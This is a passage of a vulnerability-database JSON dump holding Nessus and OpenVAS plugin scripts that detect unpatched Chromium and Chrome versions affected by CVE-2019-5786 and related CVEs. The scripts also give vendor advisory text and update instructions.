"CVE-2019-5801", "CVE-2019-5779", "CVE-2019-5756", "CVE-2019-5793", "CVE-2019-5770", "CVE-2019-5778", "CVE-2019-5804", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5795", "CVE-2019-5786", "CVE-2019-5799", "CVE-2019-5775", "CVE-2019-5773", "CVE-2019-5796", "CVE-2019-5780", "CVE-2019-5791", "CVE-2019-5784", "CVE-2019-5765", "CVE-2019-5781", "CVE-2019-5759", "CVE-2019-5790", "CVE-2019-5760", "CVE-2019-5794", "CVE-2019-5800", "CVE-2019-5788", "CVE-2019-5787", "CVE-2019-5774"], "modified": "2019-05-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:30", "p-cpe:/a:fedoraproject:fedora:chromium"], "id": "FEDORA_2019-05A780936D.NASL", "href": "https://www.tenable.com/plugins/nessus/124466", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-05a780936d.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124466);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-5754\", \"CVE-2019-5755\", \"CVE-2019-5756\", \"CVE-2019-5757\", \"CVE-2019-5758\", \"CVE-2019-5759\", \"CVE-2019-5760\", \"CVE-2019-5761\", \"CVE-2019-5762\", \"CVE-2019-5763\", \"CVE-2019-5764\", \"CVE-2019-5765\", \"CVE-2019-5766\", \"CVE-2019-5767\", \"CVE-2019-5768\", \"CVE-2019-5769\", \"CVE-2019-5770\", \"CVE-2019-5771\", \"CVE-2019-5772\", \"CVE-2019-5773\", \"CVE-2019-5774\", \"CVE-2019-5775\", \"CVE-2019-5776\", \"CVE-2019-5777\", \"CVE-2019-5778\", \"CVE-2019-5779\", \"CVE-2019-5780\", \"CVE-2019-5781\", \"CVE-2019-5782\", \"CVE-2019-5784\", \"CVE-2019-5786\", \"CVE-2019-5787\", \"CVE-2019-5788\", \"CVE-2019-5789\", \"CVE-2019-5790\", \"CVE-2019-5791\", \"CVE-2019-5792\", \"CVE-2019-5793\", \"CVE-2019-5794\", \"CVE-2019-5795\", \"CVE-2019-5796\", \"CVE-2019-5797\", \"CVE-2019-5798\", \"CVE-2019-5799\", \"CVE-2019-5800\", \"CVE-2019-5801\", \"CVE-2019-5802\", \"CVE-2019-5803\", \"CVE-2019-5804\");\n script_xref(name:\"FEDORA\", value:\"2019-05a780936d\");\n\n script_name(english:\"Fedora 30 : chromium (2019-05a780936d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 73.0.3683.75. Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757\nCVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762\nCVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767\nCVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772\nCVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777\nCVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784\nCVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790\nCVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795\nCVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800\nCVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-05a780936d\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5789\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"chromium-73.0.3683.75-2.fc30\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-07-04T18:43:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "description": "The host is installed with Google Chrome\n and is prone to arbitrary code execution vulnerabilities.", "modified": "2019-07-04T00:00:00", "published": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310814691", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814691", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2019-03)-Mac OS X", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814691\");\n script_version(\"2019-07-04T07:32:14+0000\");\n script_cve_id(\"CVE-2019-5786\");\n script_bugtraq_id(107213);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 07:32:14 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-05 15:00:23 +0530 (Tue, 05 Mar 2019)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2019-03)-Mac OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to arbitrary code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an use after free error\n in FileReader.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code in the context of the browser, Failed attempts will\n likely cause a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 72.0.3626.121\n on Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 72.0.3626.121 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html\");\n script_xref(name:\"URL\", value:\"https://www.google.com/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"72.0.3626.121\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"72.0.3626.121\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-07-04T18:43:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "description": "The host is installed with Google Chrome\n and is prone to arbitrary code execution vulnerabilities.", "modified": "2019-07-04T00:00:00", "published": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310814689", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814689", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2019-03)-Windows", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814689\");\n script_version(\"2019-07-04T07:32:14+0000\");\n script_cve_id(\"CVE-2019-5786\");\n script_bugtraq_id(107213);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 07:32:14 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-05 14:52:23 +0530 (Tue, 05 Mar 2019)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2019-03)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to arbitrary code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an use after free error\n in FileReader.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code in the context of the browser, Failed attempts will\n likely cause a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 72.0.3626.121\n on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 72.0.3626.121 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html\");\n script_xref(name:\"URL\", value:\"https://www.google.com/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"72.0.3626.121\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"72.0.3626.121\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-07-04T18:43:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "description": "The host is installed with Google Chrome\n and is prone to arbitrary code execution vulnerabilities.", "modified": "2019-07-04T00:00:00", "published": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310814690", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814690", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2019-03)-Linux", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814690\");\n script_version(\"2019-07-04T07:32:14+0000\");\n script_cve_id(\"CVE-2019-5786\");\n script_bugtraq_id(107213);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 07:32:14 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-05 14:59:59 +0530 (Tue, 05 Mar 2019)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2019-03)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to arbitrary code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an use after free error\n in FileReader.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code in the context of the browser, Failed attempts will\n likely cause a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 72.0.3626.121\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 72.0.3626.121 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html\");\n script_xref(name:\"URL\", value:\"https://www.google.com/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"72.0.3626.121\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"72.0.3626.121\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-07-04T18:46:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "description": "Clement Lecigne discovered a use-after-free issue in chromium", "modified": "2019-07-04T00:00:00", "published": "2019-03-09T00:00:00", "id": "OPENVAS:1361412562310704404", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704404", "type": "openvas", "title": "Debian Security Advisory DSA 4404-1 (chromium - security update)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704404\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2019-5786\");\n script_name(\"Debian Security Advisory DSA 4404-1 (chromium - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-09 00:00:00 +0100 (Sat, 09 Mar 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4404.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"chromium on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 72.0.3626.122-1~deb9u1.\n\nWe recommend that you upgrade your chromium packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/chromium\");\n script_tag(name:\"summary\", value:\"Clement Lecigne discovered a use-after-free issue in chromium's file\nreader implementation. A maliciously crafted file could be used to\nremotely execute arbitrary code because of this problem.\n\nThis update also fixes a regression introduced in a previous update. The\nbrowser would always crash when launched in remote debugging mode.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"chromedriver\", ver:\"72.0.3626.122-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium\", ver:\"72.0.3626.122-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-driver\", ver:\"72.0.3626.122-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"72.0.3626.122-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-shell\", ver:\"72.0.3626.122-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-widevine\", ver:\"72.0.3626.122-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-31T16:53:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310852356", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852356", "type": "openvas", "title": "openSUSE: Security Advisory for chromium (openSUSE-SU-2019:0298-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852356\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-5786\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:41:09 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"openSUSE: Security Advisory for chromium (openSUSE-SU-2019:0298-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.3|openSUSELeap15\\.0)\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0298-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-03/msg00011.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the openSUSE-SU-2019:0298-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for chromium fixes the following issues:\n\n Chromium was updated: to 72.0.3626.121:\n\n * CVE-2019-5786: Use-after-free in FileReader fixed (boo#1127602)\n\n * Feature fixes update only\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-298=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-298=1\n\n - openSUSE Backports SLE-15:\n\n zypper in -t patch openSUSE-2019-298=1\n\n - SUSE Package Hub for SUSE Linux Enterprise 12:\n\n zypper in -t patch openSUSE-2019-298=1\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on openSUSE Leap 42.3, openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~72.0.3626.121~202.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~72.0.3626.121~202.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~72.0.3626.121~202.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~72.0.3626.121~202.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~72.0.3626.121~202.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~72.0.3626.121~lp150.2.46.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~72.0.3626.121~lp150.2.46.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~72.0.3626.121~lp150.2.46.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~72.0.3626.121~lp150.2.46.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~72.0.3626.121~lp150.2.46.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:32:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5766", "CVE-2019-5769", "CVE-2019-5758", "CVE-2019-5761", "CVE-2019-5767", "CVE-2019-5777", "CVE-2019-5772", "CVE-2019-5802", "CVE-2019-5789", "CVE-2019-5763", "CVE-2019-5771", "CVE-2019-5803", "CVE-2019-5776", "CVE-2019-5764", "CVE-2019-5755", "CVE-2019-5792", "CVE-2019-5762", "CVE-2019-5757", "CVE-2019-5768", "CVE-2019-5754", 